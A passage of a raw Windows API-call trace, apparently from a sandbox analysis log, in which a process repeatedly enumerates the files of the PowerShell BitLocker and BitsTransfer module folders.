lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0264.695] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0264.695] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.696] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0264.696] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0264.696] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.696] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.696] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.696] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0264.697] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0264.697] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.697] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0264.697] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.697] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.698] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0264.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.698] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.699] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0264.699] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0264.699] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.699] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.699] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.700] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0264.700] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0264.700] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.700] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0264.700] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0264.700] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.701] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20 [0264.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.701] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0264.701] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0264.701] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db080 [0264.701] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.701] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.702] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0264.702] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0264.702] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0264.702] FindClose (in: hFindFile=0x1a8db080 | out: hFindFile=0x1a8db080) returned 1 [0264.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.702] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0264.702] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0264.702] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.703] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.703] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.703] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0264.703] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0264.703] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.703] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.704] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0264.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.704] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.704] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0264.704] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0264.704] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.704] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.704] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.705] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, 